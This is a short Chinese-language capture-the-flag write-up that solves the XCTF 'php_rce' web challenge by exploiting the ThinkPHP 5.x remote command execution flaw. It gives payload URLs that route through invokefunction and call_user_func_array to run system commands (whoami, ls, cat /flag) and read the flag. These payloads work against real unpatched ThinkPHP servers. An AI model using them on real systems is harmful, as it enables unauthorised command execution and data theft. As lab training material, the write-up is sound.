每日一题,今天我们来攻防世界web篇(php_rce)
目录
1、利用system函数远程命令执行
2、查找文件目录
3、进入flag目录
4、查看flag文件拿到flag
首先打开题目:
这里我们可以看到打开后是一个ThinkPHP V5的界面,由此我们可以判断这是一个使用TinkPHP框架开发的,接下来我们由长期的渗透经验可以想多去网上找相关的漏洞来复现
这里时使用了ThinkPHP 5.x 远程命令执行漏洞
1、利用system函数远程命令执行
构造payload

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
讯享网

2、查找文件目录
构造payload
讯享网index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

可以看到有很多目录我要找flag接下就这就进flag去
3、进入flag目录
构造payload
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag

有两个flag文件这里我们直接使用 cat 命令来打开文件
4、查看flag文件拿到flag
构造payload
讯享网index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

flag{thinkphp5_rce}

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/34086.html